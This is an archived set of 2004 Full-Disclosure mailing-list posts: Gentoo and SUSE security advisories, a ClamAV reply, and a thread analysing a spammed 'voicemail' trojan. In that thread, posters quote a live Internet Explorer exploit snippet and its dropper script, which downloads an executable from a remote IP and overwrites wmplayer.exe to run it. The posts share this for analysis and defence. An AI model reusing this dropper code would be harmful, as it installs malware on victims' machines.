> program fakes an address bar so this
> would pass through most people's safety check, after all the
> address bar clearly has the correct
> address.
>
> There are bugs in the code, for example, all your Internet
> Explorer windows will now have this
> address, but again for most people would only have one window open.
>

If you drag the explorer window around a bit, the address bar lags behind.
W

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Akamai DoS - insider job?

From: Feher Tamas (etomcatfreemail.hu)
Date: Wed Jun 16 2004 - 05:09:05 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

http://www.overclockersclub.com/?read=8733819

The Akamai attacks started in the morning and it was detected by
Keynote Systems, a web tracking company that is able to track the load
and bandwidth on the Internet. According to Keynote they saw
an "Internet performance issue" this morning
...
They have tracked the attacker back to person that is at the Akamai
Technologies ISP. No other information has been given to us at this
time. We do not know if the FBI is working on this issue right now, but
we expect them to do so.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] spamming trojan?

From: Geo. (geoincidentsnls.net)
Date: Wed Jun 16 2004 - 07:23:59 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

function InjectedDuringRedirection(){

showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] spamming trojan?

From: Joe Stewart (jstewartlurhq.com)
Date: Wed Jun 16 2004 - 07:44:43 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, 16 Jun 2004 08:23:59, geoincidentsnls.net wrote:
> Anyone want to try and analyze what this thing is? It was spammed to
> about 30 addresses here this morning.

The end stage appears to be a new variant of the Cjdra proxy trojan.
This person has been spreading trojans via spammed-exploit for a while
now, and now it looks as if he/she has upgraded to the latest IE
exploit.

http://vil.nai.com/vil/content/v_100939.htm describes an older variant.

-Joe

--
Joe Stewart, GCIH
Senior Security Researcher
LURHQ http://www.lurhq.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Re: Multiple Antivirus Scanners DoS attack.

From: Luca Gibelli (lucaclamav.net)
Date: Wed Jun 16 2004 - 07:47:41 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> *DrWeb (http://www.drweb.ru/)
> *AVG v7.0.251
> *ClamAV version 0.70, 0.72 <--- please confirm this!
> *eTrust InoculateIT version 6.0
> Are vulnerable.

ClamAV is not vulnerable and hasn't been for a long time (at least
since 0.6x IIRC).

Just try it:
$ clamscan SERVER_dwn.zip
SERVER_dwn.zip: Oversized.Zip FOUND

--
Luca Gibelli (lucaclamav.net) - http://www.ClamAV.net - A GPL virus scanner
PGP Key Fingerprint: C782 121E 8C3A 90E3 7A87 D802 6277 8FF4 5EFC 5582
PGP Key Available on: Key Servers || http://www.clamav.net/gpg/nervoso.gpg

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS!

From: Geo. (georgernls.net)
Date: Wed Jun 16 2004 - 07:22:48 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Received a spam this morning claiming I have a voicemail with the link
(warning do not click the link)

http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)

which brings up a frames based page with one of the frames containing this

function InjectedDuringRedirection(){

Anyone want to try and analyze what this thing is? It was spammed to about
30 addresses here this morning.

Geo.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200406-11 ] Horde-IMP: Input validation vulnerability

From: Kurt Lieber (kliebergentoo.org)
Date: Wed Jun 16 2004 - 08:25:32 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Horde-IMP: Input validation vulnerability
      Date: June 16, 2004
      Bugs: #53862
        ID: 200406-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An input validation vulnerability has been discovered in Horde-IMP.

Background
==========

Horde-IMP is the Internet Messaging Program. It is written in PHP and
provides webmail access to IMAP and POP3 accounts.

Affected packages
=================

Description
===========

Horde-IMP fails to properly sanitize email messages that contain
malicious HTML or script code.

Impact
======

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Horde-IMP users should upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=horde-imp-3.2.4"
# emerge ">=horde-imp-3.2.4"

References
==========

[ 1 ] Bugtraq Announcement
http://www.securityfocus.com/bid/10501

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200406-11.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA0EpMJPpRNiftIEYRAjZFAJ42DouOm6MRj7FRWplm+F8yRwdaOwCgi+6N
WILtMGU+v7jbt3OQ+bqYGLg=
=MrCt
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200406-12 ] Webmin: Multiple vulnerabilities

From: Kurt Lieber (kliebergentoo.org)
Date: Wed Jun 16 2004 - 08:31:46 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Webmin: Multiple vulnerabilities
      Date: June 16, 2004
      Bugs: #53375
        ID: 200406-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Webmin contains two security vulnerabilities which could lead to a
Denial of Service attack and information disclosure.

Background
==========

Webmin is a web-based administration tool for Unix. It supports a wide
range of applications including Apache, DNS, file sharing and others.

Affected packages
=================

Description
===========

Webmin contains two security vulnerabilities. One allows any user to
view the configuration of any module and the other could allow an
attacker to lock out a valid user by sending an invalid username and
password.

Impact
======

An authenticated user could use these vulnerabilities to view the
configuration of any module thus potentially obtaining important
knowledge about configuration settings. Furthermore an attacker could
lock out legitimate users by sending invalid login information.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Webmin users should upgrade to the latest stable version:

# emerge sync

# emerge -pv ">=app-admin/app-admin/webmin-1.150"
# emerge ">=app-admin/app-admin/webmin-1.150"

References
==========

  [ 1 ] Bugtraq Announcement
        http://www.securityfocus.com/bid/10474
  [ 2 ] Webmin Changelog
        http://www.webmin.com/changes-1.150.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200406-12.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA0EvCJPpRNiftIEYRAuwwAJ9yiTRu6OrHG75hSaDodlcOaQZOnQCeLN34
mgx1zdZtYryslTUukRRoWY8=
=EBe6
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] spamming trojan?

From: Michael Gargiullo (mgargiullowarpdrive.net)
Date: Wed Jun 16 2004 - 08:59:43 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Wed, 2004-06-16 at 08:23, Geo. wrote:
> Received a spam this morning claiming I have a voicemail with the link
> (warning do not click the link)
>
> http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
>
> which brings up a frames based page with one of the frames containing this
>
> function InjectedDuringRedirection(){
>
> showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialo
> gHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT
> SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>
> Anyone want to try and analyze what this thing is? It was spammed to about
> 30 addresses here this morning.
>
> Geo.

Here's the contents:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

so whatever w_e_d.exe is...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] SUSE Security Announcement: kernel (SuSE-SA:2004:017)

From: Thomas Biege (thomassuse.de)
Date: Wed Jun 16 2004 - 09:14:18 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

______________________________________________________________________________

SUSE Security Announcement

        Package: kernel
        Announcement-ID: SuSE-SA:2004:017
        Date: Wednesday, Jun 16th 2004 15:20 MEST
        Affected products: 8.0, 8.1, 8.2, 9.0, 9.1
                                SuSE Linux Database Server,
                                SuSE eMail Server III, 3.1
                                SuSE Linux Enterprise Server 7, 8
                                SuSE Linux Firewall on CD/Admin host
                                SuSE Linux Connectivity Server
                                SuSE Linux Office Server
        Vulnerability Type: local denial-of-service attack
        Severity (1-10): 4
        SUSE default package: no
        Cross References: CAN-2004-0554

    Content of this advisory:
        1) security vulnerability resolved:
             - floating point exception causes system crash
           problem description, discussion, solution and upgrade information
        2) pending vulnerabilities, solutions, workarounds:
             - icecast
             - sitecopy
             - cadaver
             - OpenOffice_org
             - tripwire
             - postgresql
             - lha
             - XDM
             - mod_proxy
         3) standard appendix (further information)

______________________________________________________________________________

1) problem description, brief discussion, solution, upgrade information

    The Linux kernel is vulnerable to a local denial-of-service attack.
    By using a C program it is possible to trigger a floating point
    exception that puts the kernel into an unusable state.
    To execute this attack a malicious user needs shell access to the
    victim's machine.
    The severity of this bug is considered low because local denial-of-
    service attacks are hard to prevent in general.
    Additionally the bug is limited to x86 and x86_64 architecture.

    SPECIAL INSTALL INSTRUCTIONS:
    ==============================
    The following paragraphs will guide you through the installation
    process in a step-by-step fashion. The character sequence "****"
    marks the beginning of a new paragraph. In some cases, the steps
    outlined in a particular paragraph may or may not be applicable
    to your situation.
    Therefore, please make sure to read through all of the steps below
    before attempting any of these procedures.
    All of the commands that need to be executed are required to be
    run as the superuser (root). Each step relies on the steps before
    it to complete successfully.
    Note: The update packages for the SuSE Linux Enterprise Server 7
    (SLES7) are being tested at the moment and will be published as soon
    as possible.

**** Step 1: Determine the needed kernel type

Please use the following command to find the kernel type that is
installed on your system:

rpm -qf /boot/vmlinuz

Following are the possible kernel types (disregard the version and
build number following the name separated by the "-" character)

      k_deflt # default kernel, good for most systems.
      k_i386 # kernel for older processors and chipsets
      k_athlon # kernel made specifically for AMD Athlon(tm) family processors
      k_psmp # kernel for Pentium-I dual processor systems
      k_smp # kernel for SMP systems (Pentium-II and above)
      k_smp4G # kernel for SMP systems which supports a maximum of 4G of RAM
      kernel-64k-pagesize
      kernel-bigsmp
      kernel-default
      kernel-smp

**** Step 2: Download the package for your system

    Please download the kernel RPM package for your distribution with the
    name as indicated by Step 1. The list of all kernel rpm packages is
    appended below. Note: The kernel-source package does not
    contain a binary kernel in bootable form. Instead, it contains the
    sources that the binary kernel rpm packages are created from. It can be
    used by administrators who have decided to build their own kernel.
    Since the kernel-source.rpm is an installable (compiled) package that
    contains sources for the linux kernel, it is not the source RPM for
    the kernel RPM binary packages.

The kernel RPM binary packages for the distributions can be found at the
locations below ftp://ftp.suse.com/pub/suse/i386/update/.

      8.0/images/
      8.1/rpm/i586
      8.2/rpm/i586
      9.0/rpm/i586
      9.1/rpm/i586

    After downloading the kernel RPM package for your system, you should
    verify the authenticity of the kernel rpm package using the methods as
    listed in section 3) of each SUSE Security Announcement.

**** Step 3: Installing your kernel rpm package

    Install the rpm package that you have downloaded in Steps 3 or 4 with
    the command
        rpm -Uhv --nodeps --force <K_FILE.RPM>
    where <K_FILE.RPM> is the name of the rpm package that you downloaded.

    Warning: After performing this step, your system will likely not be
             able to boot if the following steps have not been fully
             followed.

    If you run SUSE LINUX 8.1 and haven't applied the kernel update
    (SUSE-SA:2003:034), AND you are using the freeswan package, you also
    need to update the freeswan rpm as a dependency as offered
    by YOU (YaST Online Update). The package can be downloaded from
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/

**** Step 4: configuring and creating the initrd

    The initrd is a ramdisk that is loaded into the memory of your
    system together with the kernel boot image by the bootloader. The
    kernel uses the content of this ramdisk to execute commands that must
    be run before the kernel can mount its actual root filesystem. It is
    usually used to initialize SCSI drivers or NIC drivers for diskless
    operation.

    The variable INITRD_MODULES in /etc/sysconfig/kernel determines
    which kernel modules will be loaded in the initrd before the kernel
    has mounted its actual root filesystem. The variable should contain
    your SCSI adapter (if any) or filesystem driver modules.

With the installation of the new kernel, the initrd has to be
re-packed with the update kernel modules. Please run the command

mk_initrd

    as root to create a new init ramdisk (initrd) for your system.
    On SuSE Linux 8.1 and later, this is done automatically when the
    RPM is installed.

**** Step 5: bootloader

    If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there
    are two options:
    Depending on your software configuration, you have either the lilo
    bootloader or the grub bootloader installed and initialized on your
    system.
    The grub bootloader does not require any further actions to be
    performed after the new kernel images have been moved in place by the
    rpm Update command.
    If you have a lilo bootloader installed and initialized, then the lilo
    program must be run as root. Use the command

grep LOADER_TYPE /etc/sysconfig/bootloader

    to find out which boot loader is configured. If it is lilo, then you
    must run the lilo command as root. If grub is listed, then your system
    does not require any bootloader initialization.

Warning: An improperly installed bootloader may render your system
unbootable.

**** Step 6: reboot

    If all of the steps above have been successfully completed on your
    system, then the new kernel including the kernel modules and the
    initrd should be ready to boot. The system needs to be rebooted for
    the changes to become active. Please make sure that all steps have
    completed, then reboot using the command
        shutdown -r now
    or
        init 6

Your system should now shut down and reboot with the new kernel.

There is no workaround known.

    Please download the update package for your distribution and verify its
    integrity by the methods listed in section 3) of this announcement.
    Then, install the package using the command "rpm -Fhv file.rpm" to apply
    the update.
    Our maintenance customers are being notified individually. The packages
    are being offered to install from the maintenance web.

Intel i386 Platform:

    SuSE-9.1:
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.75.i586.rpm
      8d11469e1815c5b2fa143fce62c17b95
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.75.i586.rpm
      75222182ad4c766b6482e5b83658819d
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.75.i586.rpm
      45f1244f153ab1387a9dc67e7bcf20bb
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.75.i586.rpm
      517647d955770503fe61ae2549c453dd
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.75.src.rpm
      9103503f430b9d854630ecb8855a2fb3
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.75.nosrc.rpm
      9381c56f1f64835c5379dde278ac768d
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.75.nosrc.rpm
      4f47dc2be58f5315cf596c051c2892b5
    ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.75.nosrc.rpm
      732c1e7d2a9e41780464eccdc0d54505

    SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-226.i586.rpm
      7b6022e2f80325b42fa7dc3188360530
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-226.i586.rpm
      594efe04ccc233e890bfb277e8296c2d
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-226.i586.rpm
      f41d088cf20bfe583e57f95a6b46d625
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-226.i586.rpm
      39e2c09ece3f22b50eb777b85a7218ef
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-226.i586.rpm
      83398954810403b9dfb65bcf1af25352
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-226.i586.rpm
      18dde4a8af68dd1f78a0177c3214457a
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-226.src.rpm
      d5b037aaf122b1b05917e3f0b475baae
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-226.src.rpm
      e10aea97785eb12716ad7d5e20cbd723
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-226.src.rpm
      54b8bbd368998abc1a63224caa880473
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-226.src.rpm
      f944b14978ecd211c26f8169238292bf
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-226.src.rpm
      66a116aeb9757c538a0643e8322095a7
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-226.src.rpm
      5e3694ba088fd39891a5979380679d20

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-113.i586.rpm
      a5843cb4e2b16515d70574d83113ac48
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-113.i586.rpm
      724529485d3a304f0479f9216fc361af
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-113.i586.rpm
      b0e687c208053d546b7057257beb7d32
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-113.i586.rpm
      749b101e7fc4aa5c62e2a5b650002803
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-113.i586.rpm
      3377544a5f6d9c73fdfe05140fce0813
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-113.src.rpm
      0a41c750b8cd3953d47e27ea15c58697
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-113.src.rpm
      a5e5790e5f7fe62905d29750543c9e20
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-113.src.rpm
      9defa7cb706e924f8336dd03fafbcfd5
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-113.src.rpm
      8469dbc8810dd292100d085e00bb6081
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-113.src.rpm
      d990fcbace1f21ff383abdf7608a17ef

    SuSE-8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-226.i586.rpm
      43ee5eae102f0258a414dd15e3fd9433
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-226.i586.rpm
      0c6289e168307d615bfe6cef9ebcf879
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-226.i586.rpm
      003a38c53fe91070eeae85983930c70e
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-226.i586.rpm
      657d08fa4b5a2ba7de2a314a7d1622e1
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-226.i586.rpm
      e19239b4ca52ebd21f775b5e6195f144
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-226.src.rpm
      ee67f5db0ea2f1431f46b7dd27815a56
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-226.src.rpm
      b29021156d6582e315666b16231b2a60
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-226.src.rpm
      ce5e47d527cee6968cd95bb8430d3e18
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-226.src.rpm
      a081a0f1e31f5491cdeba1fea5ea6411
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-226.src.rpm
      1dbfd3b5f272fc75342ae55bbe7ab45c

    SuSE-8.0:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-299.i386.rpm
      7de319a4e6c667fba359686b814d4a73
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-299.i386.rpm
      df5aad7c423625a19af151bbba0f2ca8
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-299.i386.rpm
      cb02c8381962eda997ebb115ef68ae4c
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-299.i386.rpm
      903c6e61927803c2d592ac50fe9da6ce
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-299.i386.rpm
      e2abf9ccdc8191e7d2ace58e8a1b5b5a
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-299.nosrc.rpm
      622c85342dd84abd0400103902d05eed
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-299.src.rpm
      37916ea39febc4dd43fabfccce9322db
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-299.src.rpm
      0dde0e6758e42de5479e8776475ae76f
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-299.src.rpm
      523bef4e31fa67f078d5fcbdc426a4c0
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-299.src.rpm
      06a2a062a54764a30adae0b8ea40cb29

Opteron x86_64 Platform:

    SuSE-9.1:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.75.x86_64.rpm
      1c878b1e29a9bea40547637b6a307b2d
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.75.x86_64.rpm
      16de3ee2390bb2b92f9fe50451d4f082
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.75.x86_64.rpm
      c310268daa83f18fcfd4cf19434f06e0
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.75.src.rpm
      2fed0a8f3936027261add7d1cbfa5341
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.75.nosrc.rpm
      9ad26d15566337c83273121390ea4e32
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.75.nosrc.rpm
      352951be42b3093efb0148320a6f4c27

    SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-226.x86_64.rpm
      ced9c66ffa28bf7e7c795781f92083fe
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-226.x86_64.rpm
      60539bc47e8cac0664ac5ca824d311e0
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-226.x86_64.rpm
      083aeedd2a88ccc2e00c8f66cd61b81c
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-226.src.rpm
      58c40a206f6f615daa3486fc6d6ade38
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-226.src.rpm
      1c234f6c0475680b41c644c575ff8ef6
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-226.src.rpm
      e9b90824615859405b1979793662bc0d

______________________________________________________________________________

2) Pending vulnerabilities in SUSE Distributions and Workarounds:

    - icecast
    The icecast service is vulnerable to a remote denial-of-service
    attack. Update packages will be available soon.

    - sitecopy
    The sitecopy package includes a vulnerable version of the
    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
    available soon.

    - cadaver
    The cadaver package includes a vulnerable version of the
    neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
    available soon.

    - OpenOffice_org
    The OpenOffice_org package includes a vulnerable version
    of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages
    will be available soon.

    - tripwire
    A format string bug in tripwire can be exploited locally
    to gain root permissions. Update packages will be available soon.

    - postgresql
    A buffer overflow in psqlODBC could be exploited to crash the
    application using it. E.g. a PHP script that uses ODBC to access a
    PostgreSQL database can be utilized to crash the surrounding Apache
    web-server. Other parts of PostgreSQL are not affected.
    Update packages will be available soon.

    - lha
    Minor security fix for a buffer overflow while handling command
    line options. This buffer overflow could be exploited in conjunction
    with other mechanisms to gain higher privileges or access the system
    remotely.

    - XDM/XFree86
    This update resolves random listening to ports by XDM
    that allows to connect via the XDMCP. SUSE LINUX 9.1
    is affected only.
    New packages are currently being tested and will be
    available soon.

    - mod_proxy
    A buffer overflow can be triggered by malicious remote
    servers that return a negative Content-Length value.
    This vulnerability can be used to execute commands remotely
    New packages are currently being tested and will be
    available soon.

______________________________________________________________________________

3) standard appendix: authenticity verification, additional information

- Package authenticity verification:

    SUSE update packages are available on many mirror ftp servers around
    the world. While this service is considered valuable and important
    to the free and open source software community, many users wish to be
    certain as to be the origin of the package and its content before
    installing the package. There are two independent verification methods
    that can be used to prove the authenticity of a downloaded file or
    rpm package:
    1) md5sums as provided in the (cryptographically signed) announcement.
    2) using the internal gpg signatures of the rpm package.

    1) execute the command
        md5sum <name-of-the-file.rpm>
       after you have downloaded the file from a SUSE ftp server or its
       mirrors. Then, compare the resulting md5sum with the one that is
       listed in the announcement. Since the announcement containing the
       checksums is cryptographically signed (usually using the key
       securitysuse.de), the checksums offer proof of the authenticity
       of the package.
       We recommend against subscribing to security lists which cause the
       email message containing the announcement to be modified so that
       the signature does not match after transport through the mailing
       list software.
       Downsides: You must be able to verify the authenticity of the
       announcement in the first place. If RPM packages are being rebuilt
       and a new version of a package is published on the ftp server, all
       md5 sums for the files are useless.

    2) rpm package signatures provide an easy way to verify the authenticity
       of an rpm package. Use the command
        rpm -v --checksig <file.rpm>
       to verify the signature of the package, where <file.rpm> is the
       filename of the rpm package that you have downloaded. Of course,
       package authenticity verification can only target an un-installed rpm
       package file.
       Prerequisites:
        a) gpg is installed
        b) The package is signed using a certain key. The public part of this
           key must be installed by the gpg program in the directory
           ~/.gnupg/ under the user's home directory who performs the
           signature verification (usually root). You can import the key
           that is used by SUSE in rpm packages for SUSE Linux by saving
           this announcement to a file ("announcement.txt") and
           running the command (do "su -" to be root):
            gpg --batch; gpg < announcement.txt | gpg --import
           SUSE Linux distributions version 7.1 and thereafter install the
           key "buildsuse.de" upon installation or upgrade, provided that
           the package gpg is installed. The file containing the public key
           is placed at the top-level directory of the first CD (pubring.gpg)
           and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .

- SUSE runs two security mailing lists to which any interested party may
subscribe:

    suse-securitysuse.com
        - general/linux/SUSE security discussion.
            All SUSE security announcements are sent to this list.
            To subscribe, send an email to
                <suse-security-subscribesuse.com>.

    suse-security-announcesuse.com
        - SUSE's announce-only mailing list.
            Only SUSE's security announcements are sent to this list.
            To subscribe, send an email to
                <suse-security-announce-subscribesuse.com>.

    For general information or the frequently asked questions (faq)
    send mail to:
        <suse-security-infosuse.com> or
        <suse-security-faqsuse.com> respectively.

    =====================================================================
